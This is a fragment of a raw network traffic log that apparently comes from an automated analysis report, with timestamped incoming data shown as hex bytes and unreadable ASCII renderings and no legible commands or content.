                                                                                                        2022-09-29 12:46:35 UTC13503INData Raw: 1a 99 a0 e7 69 91 77 fa cc 9e a0 e9 a4 42 fe 38 5f 78 e2 78 c3 32 ac aa b0 33 60 00 c9 39 07 21 1f 0a e4 39 34 35 ec 88 4c 1e 38 be 87 33 45 42 13 88 67 17 7f e0 72 53 6a 5f d0 3a f5 ab 4d 5e 9d 18 72 7d 1f 53 be e0 bf 9f 64 7a c3 3e 53 c7 40 cf 28 30 a7 57 b6 b5 51 b3 05 65 46 57 e4 44 e2 9e 22 3d 52 6d e0 c3 67 d4 9b 3a 5e 98 af 1f 13 0f 19 c4 86 fb 21 ae 0e f0 89 6f 34 2c 2c 06 74 67 f6 8a c5 0e f0 15 69 f6 5e da 87 f2 20 f4 e4 c3 d0 5e ec 7b 01 f8 6f 82 6a ab b3 eb c3 04 cb 33 58 58 68 5a 24 4e 72 c3 48 35 fe 12 87 39 23 30 ba f1 6a 52 ed ec f4 47 c2 6e 50 f3 33 11 e8 91 63 fe 6b b0 e8 8b 08 50 39 0f 66 ff fd da b5 8f 4b 76 fc 60 c0 1a 0c 0b fd 0e 0a 76 16 15 fa 1a 1b 42 a0 97 24 8b 2d 77 4f 78 3a 5c 27 3d 6d 97 5a 45 b7 52 a9 42 eb 6d bb 08 c9 e5 da
                                                                                                        Data Ascii: iwB8_xx23`9!945L83EBgrSj_:M^r}Sdz>S@(0WQeFWD"=Rmg:^!o4,,tgi^ ^{oj3XXhZ$NrH59#0jRGnP3ckP9fKv`vB$-wOx:\'=mZERBm
                                                                                                        2022-09-29 12:46:35 UTC13505INData Raw: 05 97 65 25 2d de 3c 06 23 bd a1 ad 75 9e 7f 2c 32 15 52 68 9b e9 ce b4 fe 0c b6 5c 0c bf 59 dd 2f 44 a9 dc 62 5c ae dc 65 46 cd c7 41 1e 05 a7 c2 14 97 d4 7d c3 ab 0f 2d aa 52 05 15 8e 19 2c 36 68 d3 0b 71 74 b5 0c 22 21 5e 88 12 df 68 d2 5a 55 0d 76 f5 cc 9f 1f be fd f4 cf 58 b9 a3 cd d9 a7 12 39 f2 47 8e 88 38 64 fb f8 80 c1 4e f3 97 7c 10 8f b4 9b c0 96 3d f3 67 09 60 4d 32 a2 91 69 95 47 f6 93 f1 27 77 26 8b a0 4c d4 55 dc e0 65 9e 91 34 92 76 0c ca b5 6d 13 c5 64 3f 34 51 74 bc 15 be 7f 3c e7 da 88 65 83 e3 e4 34 04 bc 43 14 78 1c 3f 5c 98 92 2c 20 0d a3 d9 8f 90 72 3f d8 b1 7a fe c4 c6 c3 e0 2a 23 7d 9d bc f4 c5 52 a6 85 23 d5 e5 74 2f af 18 20 33 c1 de a3 84 51 b3 82 38 cc 72 cc 60 31 7e 5e 1b ca b1 6f 6a f6 63 99 65 3c 63 6b ba 6d 01 89 bd 7e 6c
                                                                                                        Data Ascii: e%-<#u,2Rh\Y/Db\eFA}-R,6hqt"!^hZUvX9G8dN|=g`M2iG'w&LUe4vmd?4Qt<e4Cx?\, r?z*#}R#t/ 3Q8r`1~^ojce<ckm~l
                                                                                                        2022-09-29 12:46:35 UTC13506INData Raw: 1e 67 a9 12 14 43 59 76 df 20 2a f1 b9 d9 0f ca 9a 1a a8 eb 07 65 79 86 06 a1 d0 ee 38 77 64 bb 4d a2 36 b5 43 7d 9e ed 56 11 45 f6 a7 97 12 88 50 5a 1c ce 47 5a 3d 4c 2e f1 1d 41 dd 3b 28 61 f1 0c c1 e6 54 44 e4 fb e6 02 60 a3 09 ab 76 39 01 ec 91 89 c0 ff b9 4d 88 ce 25 eb 51 4a 68 8a 5d a9 e2 3a e6 f5 14 97 b5 b3 eb 9d fa 4e 96 4d 6f c6 61 c6 b9 8e 9d df 7e f1 9b d1 48 c3 23 e9 2f a0 11 bf e2 22 11 4f 59 cb 25 25 49 6a b1 c8 77 93 4b 4a 63 da 70 a2 89 74 a3 19 c7 a9 67 87 e4 f2 e0 95 b3 c4 57 f7 02 3b b2 d5 b9 fb 9f 68 9b f3 de 4b 4b 41 83 eb 54 d6 52 37 40 13 dc 7c d9 31 50 0f 5b 74 bc 42 a2 06 11 5e 7f 61 6c e7 f6 b4 4d d7 25 12 67 30 cc 10 a3 54 9c 14 96 c9 6c 7f a0 01 0b 56 c1 d3 f3 81 46 54 91 7a 5e 04 3f 59 27 90 19 85 a2 3f b5 ea d4 20 40 cd 37
                                                                                                        Data Ascii: gCYv *ey8wdM6C}VEPZGZ=L.A;(aTD`v9M%QJh]:NMoa~H#/"OY%%IjwKJcptgW;hKKATR7@|1P[tB^alM%g0TlVFTz^?Y'? @7
                                                                                                        2022-09-29 12:46:35 UTC13508INData Raw: f2 42 eb 12 bd 7b 2a b5 07 47 bd 7c 97 67 e1 72 cf c5 df 66 d2 21 d0 33 24 4a 55 51 d5 cc dd 4b 52 12 50 83 17 1c 62 c5 a0 ff ed 12 77 70 fb f2 2f 45 f5 30 49 ad 49 26 b3 ed 7c c7 c9 13 ce 02 e9 a6 fa f0 6d c6 e4 44 70 d9 38 3e b8 63 2c af 78 22 12 05 2d 18 73 7a c6 20 cd de 44 ad e1 7a e2 c5 0e ad 1d 03 7c 8a 2e bf 25 e4 e0 69 f8 2c e1 73 d7 54 75 dc 8a 56 97 8b a3 1b d6 41 7d b5 26 75 27 a4 0d ed 42 24 ed 8b 41 80 fe d2 f0 3d a9 48 f4 04 7c 01 3b e8 9b fc 9f 6b fc 7c 25 1e 4a 1e f1 d0 83 1d d0 8c 8f 30 64 45 2e 00 fe fc 0d a2 b6 fa fb b6 ef 01 65 a3 23 44 1a f8 bf c4 2c c0 98 7e 80 19 01 b6 63 c0 ec 09 82 16 27 37 cf 66 ab 51 52 c0 5e 86 1e 73 69 4a c1 08 d4 89 20 ab ca f9 8e c8 34 5a d1 ca 19 14 d1 44 6b 22 87 cb 01 9d e5 37 e3 8b 34 6d e7 55 a4 fb df
                                                                                                        Data Ascii: B{*G|grf!3$JUQKRPbwp/E0II&|mDp8>c,x"-sz Dz|.%i,sTuVA}&u'B$A=H|;k|%J0dE.e#D,~c'7fQR^siJ 4ZDk"74mU
                                                                                                        2022-09-29 12:46:35 UTC13509INData Raw: 7f 70 9e c4 57 ca 25 90 c7 68 bf 51 4b be 03 4e 08 67 1e fc 02 da 1a d5 ce d1 b8 f5 65 ab 90 b0 4b a8 c1 4f 62 ce 51 c4 4a 95 38 29 c9 84 c7 eb 06 00 d7 1f 4d 6a e7 44 1a 67 b8 d4 3d e3 22 3d 6f 29 b8 0c 48 16 25 ee 68 fc b1 7e 6a 4c 9f d7 e5 0b 99 64 fc ab c1 67 66 fe 13 4a 54 e2 73 54 7f 91 7b 8f aa d8 83 b1 56 63 55 71 2d ec 3b 2f eb 54 f8 49 7d cf 29 25 6f 5b d9 07 66 63 fc ef 0b e5 03 16 a7 7b 8f 90 00 38 68 61 01 db 42 08 aa 95 2a df 06 ee 7c af 7d 15 7f 08 cb b5 71 c6 74 db 16 2f 6b 10 6b 4b 30 cb 77 22 a3 96 5b 89 e4 d7 79 a0 58 66 e8 9f 8a ce 02 0b 01 9f e8 6b 70 65 05 4f e1 1a 28 18 eb a9 68 fd 63 53 50 0f a2 78 bb 15 a9 a9 0e 2d 0d e1 98 21 2c a4 96 c6 ce 4f 63 d3 8e 08 83 44 d2 a8 c6 0c a0 11 08 78 0a 6b 5d 66 39 2b f4 57 51 0f 08 84 e4 66 a6
                                                                                                        Data Ascii: pW%hQKNgeKObQJ8)MjDg="=o)H%h~jLdgfJTsT{VcUq-;/TI})%o[fc{8haB*|}qt/kkK0w"[yXfkpeO(hcSPx-!,OcDxk]f9+WQf
                                                                                                        2022-09-29 12:46:35 UTC13510INData Raw: 47 b5 b7 85 40 c2 12 cf cc df d1 98 79 68 53 e4 0c c9 82 1c 52 3d 7a a7 1c 3b e5 fe c7 2c e9 87 bc 7e 04 17 b7 20 2d cb 41 59 d2 57 7d e6 2a e1 2e 52 21 68 f9 ea 0e 33 73 ab b0 e8 7b 28 0f 7f 32 73 f7 fb 91 7c fc 90 36 57 0f fc 41 2b 6d d4 c3 37 70 df 96 d3 ab 4a 3c c9 ca 77 24 c9 28 9e 13 ef 7c 1a 2b 1d 64 c9 16 60 43 ee 6c 1b fc bd 1e 74 4e c5 29 11 6d 4e 03 ff b4 b8 b6 72 ad 9c 17 4c b5 f3 5d 67 a6 79 06 c4 b7 d0 7e 8a bc 1c 06 4f a8 6d 2e 4e c0 31 1b 65 e7 45 62 75 47 20 21 e7 66 c9 01 e5 a7 83 74 1c d2 61 82 41 1d 42 98 8a 7a 45 0b d3 a7 12 5c e4 67 f3 ae 00 db 3b d3 0b a7 8d 2e 13 0f a8 19 7e 7e 7d ee 75 6d 47 18 9a 53 32 b2 47 30 fa 0c ae 81 90 7c 74 26 cb e9 5b d1 6c ba 2e d1 2c bf 76 22 5d 37 34 be c4 56 1f 33 f3 bb 2f 71 a1 e1 eb 83 fc 17 d7 1f
                                                                                                        Data Ascii: G@yhSR=z;,~ -AYW}*.R!h3s{(2s|6WA+m7pJ<w$(|+d`CltN)mNrL]gy~Om.N1eEbuG !ftaABzE\g;.~~}umGS2G0|t&[l.,v"]74V3/q
                                                                                                        2022-09-29 12:46:35 UTC13512INData Raw: 47 73 e9 ca 34 b9 b8 2d b4 5b 07 09 d6 f2 5e 33 85 da 1e f8 42 88 d9 8d cd 05 f3 01 66 d1 05 ce 3e 45 5c 7f d5 02 0a 80 2e 15 27 44 06 44 b3 26 ac 87 34 11 da aa 33 39 d1 c5 fc 76 2d 5b ed e9 69 97 41 44 2d 01 b3 18 3f 9c fb 07 51 6e 40 e6 11 b1 77 77 4f d5 1c 9d 0b 25 18 7a 99 e3 62 c4 85 2c 94 e4 86 e0 01 29 22 6e d9 27 02 14 0f a1 00 5c 87 f4 d9 ea 9e d6 80 fa c5 ac eb 97 94 b9 5f 69 33 e5 99 91 b8 83 41 62 74 03 89 ad c1 60 dd a5 10 e7 08 13 87 22 29 c2 a5 52 46 a8 a1 31 c7 4e 8a 2d 9b 3d 0a 65 c6 d5 57 2b 4d af 89 b5 78 5b 5d cb 1c ee 92 1f 5a 29 93 88 b8 92 bf 9e 54 7a b7 d9 04 40 af 78 5b 73 20 e6 62 c5 d2 98 14 db ac 0f 1a f2 be 9e ea 60 fc 17 ce 8e ed 5b 82 7e 5b c1 ec c0 97 d2 a8 8c 23 75 a3 d1 22 ab b6 f3 36 55 3f 4a b1 cc 3d 90 c9 8f be 00 b4
                                                                                                        Data Ascii: Gs4-[^3Bf>E\.'DD&439v-[iAD-?Qn@wwO%zb,)"n'\_i3Abt`")RF1N-=eW+Mx[]Z)Tz@x[s b`[~[#u"6U?J=
                                                                                                        2022-09-29 12:46:35 UTC13513INData Raw: b4 d8 b8 2c 18 98 f2 9d 0a 9f e0 d0 c7 f0 af 45 cf 25 99 83 cb 90 e3 5c 65 3d 34 5d 96 b8 6f bb 90 69 0c 2d 6b 0f 82 8d 00 45 41 d2 2a 56 e0 18 e8 40 87 01 89 b2 23 f0 55 e3 47 55 84 d3 32 a7 47 02 c3 bd 49 1c 61 5b f3 3e c0 5f d4 7e 36 9a e8 00 be 05 01 60 d0 6f 91 05 8a 98 dc 66 01 ed d7 f9 16 95 de 87 45 ce 12 7c 17 09 5c 1b ca 0e 55 0c 3e 6b df 0e a5 2f e2 a5 87 b2 a2 76 e2 f4 1c e3 3f 16 7e 94 07 27 ce a8 92 29 30 25 c4 0c f5 cf e7 86 4c 68 8e 66 7b 5c 51 5e 64 f6 b6 3f 72 8a 4a a8 5d 4e 11 b7 91 eb b7 90 d1 ab ab d8 a8 3c 3c 6a 5d ff fe 37 ef 23 59 d8 e8 a6 b8 ab 98 54 45 21 65 f4 66 8f d6 9b 4e fd 91 24 91 4f 9f 9e 51 8e 85 1b c7 0a 55 89 75 1d 25 a4 74 8c 9c ba a6 76 db 86 ae 93 02 89 7c 5d fe b1 5e cd 73 9a f6 70 16 ea 7d af e2 0f 6c f8 6f 3a 73
                                                                                                        Data Ascii: ,E%\e=4]oi-kEA*V@#UGU2GIa[>_~6`ofE|\U>k/v?~')0%Lhf{\Q^d?rJ]N<<j]7#YTE!efN$OQUu%tv|]^sp}lo:s
                                                                                                        2022-09-29 12:46:35 UTC13514INData Raw: 78 d4 0b 94 9f cb 13 91 7e 6c 96 fa 7f d6 0c f7 59 af 3e 38 b9 74 90 e5 a2 46 db 4d 26 67 7f f8 aa b1 1a 08 3b e4 c7 25 6d 45 7b 64 ba 92 cb 8a a8 95 8d 62 9d 66 89 d0 0d 01 7f a0 9f d0 c8 de 65 40 b4 c9 65 ec 2a 2e d3 5f a3 c7 e1 89 ec 96 89 ed 1d bf 64 9b 74 49 81 8a 3b 7f 7d de 74 d0 2f 07 4e 1f 60 ff dd e6 1e 32 74 3b c9 9e 95 58 01 43 98 d0 74 c4 0e 87 c9 14 40 7f 64 e2 7b 30 54 07 99 3b 4f eb b1 f3 6b 1c 76 c5 e3 03 bf 90 48 cb d6 5a 10 19 98 df a0 77 ac de 53 73 ca 8a 0b e5 d8 1c e7 1d c8 c2 a6 9f 2c d2 6f b4 20 c7 6f 50 1f aa 71 ec b0 a4 8d fb 0f 98 ac 47 ae ac db a8 fd 58 a7 3d 12 9b e2 c2 3b 73 28 52 4b 59 34 02 c4 72 b6 16 bd 19 43 bc 81 2d 1d e5 3d 08 bf ab 12 52 99 fd bb 3b 1c bd ef 93 0c ad 13 71 7c 53 8c b8 2e 3e 67 f5 5a 6b 38 30 8f 46 22
                                                                                                        Data Ascii: x~lY>8tFM&g;%mE{dbfe@e*._dtI;}t/N`2t;XCt@d{0T;OkvHZwSs,o oPqGX=;s(RKY4rC-=R;q|S.>gZk80F"
                                                                                                        2022-09-29 12:46:35 UTC13516INData Raw: 10 76 be 98 50 05 de 47 65 e5 cd c1 50 1b de 90 69 fc ec 09 0e 7a f8 84 81 c3 49 c8 ad 15 43 d2 0d 9a d4 82 e6 ba 51 b5 ae 73 5b 93 10 0b 97 82 73 e3 c6 d1 81 1b 4d ae 8b 7f 6f e5 09 c7 fa 57 b2 8a c7 12 f9 2f 6f a1 a6 cf 44 e1 42 e4 e4 64 4a d8 37 38 af 67 7d ca bf eb 57 23 8f fe a8 1f a7 08 09 06 f1 39 72 7c 08 33 a1 63 41 04 0f 14 20 64 e3 98 4c 1e f1 e6 63 68 50 b5 b1 b2 6e fc f6 34 d5 84 b0 47 39 5e d4 51 5c fa cc 63 3f 53 20 4f ef d1 7d 7e 00 9d 0f c9 50 d1 d2 e9 0a af 56 84 e4 ab 1a 50 09 61 8a 4d fd 25 0c 0c 04 7f 9c 30 5b cb 95 df 3d e2 13 43 c2 63 43 b6 91 2e 53 d6 a0 f9 67 6c 59 2c 35 05 64 1b e7 a7 40 15 35 80 70 9b 88 a1 e8 4b 3c 2f 6f 25 a8 8e 18 c9 d6 1f 2a 4f 3f 96 c8 0a 5f 01 7a 92 83 76 97 6f 1e a8 31 05 f9 ff 49 a4 c8 30 33 bf 15 b7 fa
                                                                                                        Data Ascii: vPGePizICQs[sMoW/oDBdJ78g}W#9r|3cA dLchPn4G9^Q\c?S O}~PVPaM%0[=CcC.SglY,5d@5pK</o%*O?_zvo1I03
                                                                                                        2022-09-29 12:46:35 UTC13516INData Raw: a4 14 d4 89 f1 cf e6 2b 5e fd c8 48 98 fb 9e e0 56 f8 35 17 ae b9 08 ac 3c cf 55 56 02 a5 9f 32 c6 8e 83 4f 66 75 8f d3 0c 29 46 57 72 a9 b2 93 3c b7 c7 96 15 3e 9e 57 2d 7d f2 f0 79 4f a5 d3 3c 93 d5 09 5b 91 c9 fb 54 8e 04 48 b1 1c ed 8c 9b f2 0d 77 d6 e2 9b a1 7f d0 65 2a 7d fb 11 fb 10 56 10 65 03 64 6d c2 da 1a 94 49 fc 30 ed db 84 28 f4 5b e2 1f a0 a0 33 b1 c8 33 71 ac c3 1b a6 e8 9a bc 38 b7 0c 28 5d 84 2a 4b 66 6f fe a1 46 2e 67 8b 22 ab 55 d7 a1 e4 7e 69 c1 19 28 6b e1 50 e6 f9 cf 81 83 93 2c 16 1d 60 62 77 64 fc 15 c9 20 33 cb 43 33 56 3d 96 9d b7 cf de 98 d8 ab 69 7c 11 93 59 21 fd 39 10 49 af 6a 51 0f 75 97 61 de 4f 80 7a 61 8c 94 4f 91 85 4d 4a 1c 32 9f 6e c8 21 25 ea 32 4b c1 86 8c 70 20 1f ac 09 18 d4 4f c7 55 99 40 c5 60 e9 d8 98 33 9a c1
                                                                                                        Data Ascii: +^HV5<UV2Ofu)FWr<>W-}yO<[THwe*}VedmI0([33q8(]*KfoF.g"U~i(kP,`bwd 3C3V=i|Y!9IjQuaOzaOMJ2n!%2Kp OU@`3
                                                                                                        2022-09-29 12:46:35 UTC13532INData Raw: c7 e8 0e 77 5e b5 9b 17 cc c2 56 3b 99 5a 91 c1 40 74 ed 0e 8e 80 95 19 fb 43 ea d9 22 a2 16 4c b4 a3 9a 84 12 c5 1d c4 72 0f 16 66 2e e5 4f 74 87 65 ab 9c 3b 37 18 31 1e b5 ba 93 e5 2a ae b3 d2 e4 94 38 b4 57 c3 3a e3 1b f6 6e 5b ca c4 03 36 2a ef fb f0 6f 02 39 99 52 f3 ee fe 7b 35 73 c2 49 fd 91 e5 01 a9 2e 83 41 06 51 0a 1f 0f 05 0e d4 5d 6a a5 eb 9b 55 dc 19 cd 1f 70 d6 94 35 cb e1 e3 78 bb 1f 49 f7 a8 d3 e1 30 2a 83 3f 78 6e 60 93 ba 8d 58 9b 02 a1 7b 02 31 08 05 57 41 c4 0d 3a f9 f7 74 e7 d1 03 72 21 f7 e5 1f 4a 3c 94 46 53 e0 5d fb 00 4b a3 a0 b0 0a c2 6d 28 75 7f 98 2c 93 3c 9e 94 4d b9 f3 ed 74 7a c7 53 58 b4 32 5a c4 9a 4a 31 10 c7 a0 bf ee c5 17 c8 b7 2b 1f 82 92 71 55 41 78 1b 93 77 da 7c fe d4 a2 bf 37 8f 51 b9 6f b7 bf 4f c8 88 c2 fd ca 51
                                                                                                        Data Ascii: w^V;Z@tC"Lrf.Ote;71*8W:n[6*o9R{5sI.AQ]jUp5xI0*?xn`X{1WA:tr!J<FS]Km(u,<MtzSX2ZJ1+qUAxw|7QoOQ
                                                                                                        2022-09-29 12:46:35 UTC13548INData Raw: e1 2e 14 ed 2d a9 8b 03 b0 ca 85 44 b6 cb 1a c2 d8 01 64 bd 14 a8 86 6a 32 db f6 34 c4 a4 12 78 4e 63 48 91 a3 4f 38 55 cc 41 87 08 50 ab 9d 3a b4 2b 9a 77 e4 cc 2e c9 49 9d f8 66 d4 87 e0 e9 ab 7d bd 12 41 f5 31 bf 76 2b 80 c4 cc 87 f9 4e 4e a6 68 08 15 2d 72 16 d3 01 3f 51 76 ae d9 89 0e 07 b8 5a 43 b2 89 8e e0 e3 21 df 04 43 c7 30 89 51 16 68 45 59 52 08 0a 93 5d dc d8 11 94 e4 25 2e 3a da b2 38 9c d1 9e b2 bb d5 3c 26 67 63 1e 6c b8 2c 99 c2 b1 56 18 87 73 1d f2 26 71 6d 59 91 7c a3 40 55 55 39 7a 5d c8 47 28 03 7f 5e df 98 64 1e ad 39 aa 1b 9a 67 9b 7e 87 26 fd c4 4b a3 57 8b 91 56 b5 c4 81 4f 63 0b 15 4d 54 5c 2b 89 2b 3c 38 8c 7b f7 56 7d af 5c c2 8f fd e8 74 f3 94 a3 8a dd 42 1c 62 7e c0 5a 92 7f 1d e4 ac af bb a5 db 0d d5 66 17 66 cf 00 bf b9 4a
                                                                                                        Data Ascii: .-Ddj24xNcHO8UAP:+w.If}A1v+NNh-r?QvZC!C0QhEYR]%.:8<&gcl,Vs&qmY|@UU9z]G(^d9g~&KWVOcMT\++<8{V}\tBb~ZffJ
                                                                                                        2022-09-29 12:46:35 UTC13564INData Raw: d2 c6 ca 55 86 c6 7e 8f bc 08 07 b8 ed c6 79 ff eb 3c 89 7e ba c8 1d 09 3d 0a 6c fc 36 2d be 62 18 12 9a 89 35 1d ff f1 b5 11 74 97 de e8 70 c4 46 ba 82 c8 6d bd 00 c0 99 bd ca af 88 d4 d2 b7 83 c2 13 62 77 d7 a4 30 e9 85 36 21 2e 39 ef 78 0d 2c fe ad b2 a0 a8 f1 71 0c e6 c9 fe 30 61 90 92 ef 81 86 12 14 50 ce 99 16 f6 9e 29 9e 46 03 ac 62 b2 36 f6 5f 97 18 a8 0b 2c 15 11 34 f6 30 d8 eb 1f f2 5a 1e 9f 6a 37 ae ca 9d 32 eb a1 88 ba ac 8e 56 ed 05 a0 05 4c 7b 86 fc b5 ce 40 e4 25 f8 b9 2c fa 2d 95 61 72 01 dd 11 ce 7c 66 75 b7 f9 6f 56 99 bc a4 d8 2c cb 1f 8a 50 42 ac 67 aa 7f 47 8c f1 8c 1f 98 e5 54 65 14 1b 9d ca be b8 b1 07 03 aa e0 26 f7 d9 be 66 02 be 52 9b ba dc 01 da 31 7f b2 ca a8 d3 4a b3 a1 96 58 d8 41 97 e5 2b 1b 05 55 bc 58 74 f9 89 a8 1e 42 dc
                                                                                                        Data Ascii: U~y<~=l6-b5tpFmbw06!.9x,q0aP)Fb6_,40Zj72VL{@%,-ar|fuoV,PBgGTe&fR1JXA+UXtB
                                                                                                        2022-09-29 12:46:35 UTC13580INData Raw: 94 d6 02 ee 22 a6 9e 02 05 6c 27 96 fa 60 d2 c4 db cd 15 4b 29 1a fb 0e b6 f6 1f 4e d4 fe ad 1e af 6c a2 c3 7c f2 c1 73 e9 93 20 42 a1 d3 28 d8 8a 05 5d 89 b6 58 f9 1a 1c 48 f3 dc ca f8 ef 26 b3 a7 7f b4 5e 4a 5e 61 df c8 0b b1 90 47 74 dc 16 18 bc 5b ba e0 45 a8 5b 6e 15 08 c3 2f 77 dd c1 1c 45 3c d0 19 76 7c 57 9f ce 67 28 a4 65 d4 e1 89 eb ca 72 67 b0 a8 ba d6 99 b6 20 f1 5f 6e df bd fb 4a b4 c6 93 3d 43 ef b1 10 b1 b4 46 9b ec 99 55 c3 77 fc 44 7f 78 c0 b4 39 89 90 7b 34 41 7f f7 af 1c 2d 64 62 63 94 7e 79 e3 5a 94 3e fb 3b b1 a8 21 93 88 83 c6 07 cc d8 fe 5e fb 49 e1 31 cd 58 d4 7f 01 9a 3e f3 81 57 e6 a6 fc a9 b7 e7 8f bb 48 7c 71 2f 7b b1 70 aa 93 00 15 a1 7f 06 88 c0 82 8a 1b 9c 72 52 c8 67 eb de d4 73 13 f5 17 fe c5 76 a0 02 fb 95 15 7a 3b da e4
                                                                                                        Data Ascii: "l'`K)Nl|s B(]XH&^J^aGt[E[n/wE<v|Wg(erg _nJ=CFUwDx9{4A-dbc~yZ>;!^I1X>WH|q/{prRgsvz;
                                                                                                        2022-09-29 12:46:35 UTC13596INData Raw: 8b d6 cc 37 f8 03 d4 eb d7 ee 16 4f c9 65 71 65 6b b3 96 e1 9b f1 4d 06 e5 d3 e3 98 04 21 ca ba ad f5 f4 c4 13 db a7 22 72 ce 75 6e 18 39 72 8d db d2 7c ea dc ac 4c 9a ec b8 b2 0c 97 91 99 f9 c5 2e a8 a1 bc 5e 2f 93 79 c7 41 cb 7f e3 c7 d8 e7 38 12 2d bb 7b d3 56 4a a2 f6 07 f5 eb a3 5d 29 47 4a 07 af 53 23 19 b6 25 a6 e2 d7 98 6a 53 51 e2 88 aa db 25 00 4c d7 9e fb 00 52 f8 bf ad 7c a6 fa 22 5e fe 84 14 fd 9d bf b0 63 e6 78 c5 30 9b aa 98 9c b6 3a 19 59 db e9 80 c7 2a 17 1c 0c 10 b7 8e c9 c5 31 05 43 21 1b 6b ae 3e a6 76 27 3a 08 9e 83 c6 1c 31 63 7f 38 50 e8 8b a0 40 63 a2 dc 55 b1 67 7a 12 15 b6 3f 1d 33 33 6d a1 b8 f5 ec 1d 52 8d ed c1 13 39 2d d5 7d 97 ab c8 0f 81 aa fe 33 9c 52 1d 6c 80 8b c7 55 39 57 4a 4b 83 07 fd 58 1c 99 a9 29 1e 95 b3 4c 60 c2
                                                                                                        Data Ascii: 7OeqekM!"run9r|L.^/yA8-{VJ])GJS#%jSQ%LR|"^cx0:Y*1C!k>v':1c8P@cUgz?33mR9-}3RlU9WJKX)L`
                                                                                                        2022-09-29 12:46:35 UTC13612INData Raw: 9b a8 25 20 f7 05 f2 4b 4f d8 6b 16 02 1d fe 48 ff b2 c9 f3 cb 6a 4c 4a 13 7a 97 57 bb a9 67 32 89 b1 0b f4 e7 8d a2 d7 bb d4 53 6e 6b 19 f9 e0 a5 5c e8 92 ca ec 60 c6 b8 1f c9 d3 85 dc 0e f3 63 50 49 ed a0 e3 92 8b 00 09 a7 70 e3 20 85 52 29 a0 4f 30 f9 1e fb c9 44 bc d2 9d ed ee aa 70 b7 f1 70 e7 5b c2 eb d5 27 c4 7b d2 38 bf 31 a2 a5 d4 3f 1b 6a f0 d4 d3 38 b5 2b 3c dd d9 46 a5 20 0e fa e8 94 20 8f 98 4c 0a fe 91 23 09 55 ef b8 48 79 d2 e7 d9 f3 36 52 3d 7f b6 c4 20 d7 76 37 27 1c 5d 28 04 dc 46 2c 92 2f 55 cb 10 bf a8 6c a9 2d 10 5e 58 ae 05 7a 85 07 69 7c 54 1f f5 6a 74 65 13 f4 d8 58 fb db 6c 0c bd 5a 2b fd ef b4 a7 0e 30 ac 0c 74 8c ae f7 f2 f9 a5 25 4e d3 53 a1 1a 7b 96 bd e2 1b a2 a0 5d c0 92 01 bc cb ce 97 dd 62 8a 0e 9e db 57 83 15 79 ea e4 0c
                                                                                                        Data Ascii: % KOkHjLJzWg2Snk\`cPIp R)O0Dpp['{81?j8+<F L#UHy6R= v7'](F,/Ul-^Xzi|TjteXlZ+0t%NS{]bWy
                                                                                                        2022-09-29 12:46:35 UTC13628INData Raw: 01 58 c7 82 91 00 a8 f0 e5 c7 66 cf cd 0b 69 15 cb 59 b2 d5 f3 0a 91 46 37 33 d1 30 39 a0 eb b3 e1 e0 db 2e 3f cc 55 53 b3 bf b4 db 22 34 73 5c 33 11 9b 1b f2 f1 9b e0 c6 e0 a8 1d 4e 12 f2 f9 b5 a6 89 ea 36 8d 1c ad b6 11 92 2d ca af 07 4d 20 84 dd 03 24 6d 82 c9 bb 52 be 5a 20 75 2f 47 6d f8 52 87 29 31 60 11 28 b5 ad ef 5b a2 1f 81 80 23 b7 4e de fe 9b 50 6a a7 e7 a7 36 82 d7 0f 08 ef ae ad 7e cd 7d 19 8d f9 df 97 ee ba a2 a2 7b 87 cd 3d 0c e4 52 9f f2 35 4f b9 7e b4 31 e6 83 94 d1 bf 76 50 97 cc 94 5a 0c d1 4c 6c f9 03 18 4a 41 63 18 62 d5 92 47 e1 34 ad d0 0b cd 40 40 b5 fb 21 9c c0 92 a4 1e d6 63 b9 a2 22 12 ba cd 61 0d c2 c3 be 33 e5 46 bd 6a e5 bd b5 1c 94 1d ea b8 40 94 be 78 79 2f 21 64 37 dd 5c f7 b9 53 91 6e 2f 47 c9 50 2d fe 3b cf cf 63 6f 5e
                                                                                                        Data Ascii: XfiYF7309.?US"4s\3N6-M $mRZ u/GmR)1`([#NPj6~}{=R5O~1vPZLlJAcbG4@@!c"a3Fj@xy/!d7\Sn/GP-;co^
                                                                                                        2022-09-29 12:46:35 UTC13644INData Raw: d8 6d 88 55 53 3f f1 67 44 25 db 3a 8b 12 3a 19 2a 8d a3 ae 0c 98 d7 27 8f e0 df 5f 62 05 97 db 81 8b 69 3e 74 54 5d b9 c9 22 42 7e 48 f6 c7 77 d1 d3 18 3e a4 cd bc 02 39 1d d7 a0 0b 19 78 96 ab 69 f9 0a 40 20 75 5c 95 2f bb c1 0e 39 92 db 03 38 67 17 ef d7 f1 ad 94 97 0b 17 76 ef ee b6 c8 26 c1 d2 87 89 34 ef cf e7 31 e0 c3 9d 9e 31 f1 87 b4 ae 75 7f 38 7c 40 89 fd cc dc a7 d6 e3 11 89 6b 61 c1 79 ec fb e2 4c ae 91 1a 28 78 75 ec 68 5e b2 4b 0e 9d 26 4c da 79 f7 07 d6 72 9b 87 22 bd b4 59 56 ef 63 75 10 86 31 9e 19 cd 5f 91 fe 66 24 d1 9d 5c dc 0f 4b 0d ab 50 c5 75 78 c8 92 fd a0 7e a0 c8 a3 a5 14 8e 58 6b f9 da 81 bb 33 ad 5b 05 69 e0 9d 34 9d 78 b0 00 ef 32 aa 29 34 b5 f9 3a af ee e6 14 60 4c 1c a6 f5 a8 49 08 ef c6 46 e0 62 1a a1 49 8e 54 a1 c3 44 83
                                                                                                        Data Ascii: mUS?gD%::*'_bi>tT]"B~Hw>9xi@ u\/98gv&411u8|@kayL(xuh^K&Lyr"YVcu1_f$\KPux~Xk3[i4x2)4:`LIFbITD
                                                                                                        2022-09-29 12:46:35 UTC13660INData Raw: 69 08 6f 7d 52 f8 d7 f5 67 63 f9 b6 36 9e 4b 8f 28 bb 91 85 01 da 3c f6 f5 65 0a eb cc 17 ed f7 f7 b1 4e 4d 18 1d 58 58 1c b9 a3 92 3a 6f 46 25 03 7f f8 83 6f f6 9d 6f 6e ee cf 2b be cd 15 1e 25 63 b1 ee 7e 36 77 2e 4c e4 a9 b0 e5 65 6c e9 a5 90 4c ce 3d ce 6b 3d 59 26 cf 43 10 63 c1 47 f3 5c 9d f1 e2 86 7d ff dd 90 96 c7 34 ba f9 a9 5b 7c d9 ac fa 1f 62 fc 49 07 68 5d d7 53 e2 57 82 bd c6 ea 4d 3c 70 b1 d3 38 88 fd d2 ea 93 92 0b 74 bd e5 64 85 1b 80 5d 0a 58 8c b5 db 22 40 7d d6 45 9e c1 ed e6 8b 86 a9 d2 c8 3e ef be 07 6e f0 22 49 09 b7 73 61 67 5c 43 c9 ec 96 03 66 bf 32 62 2b 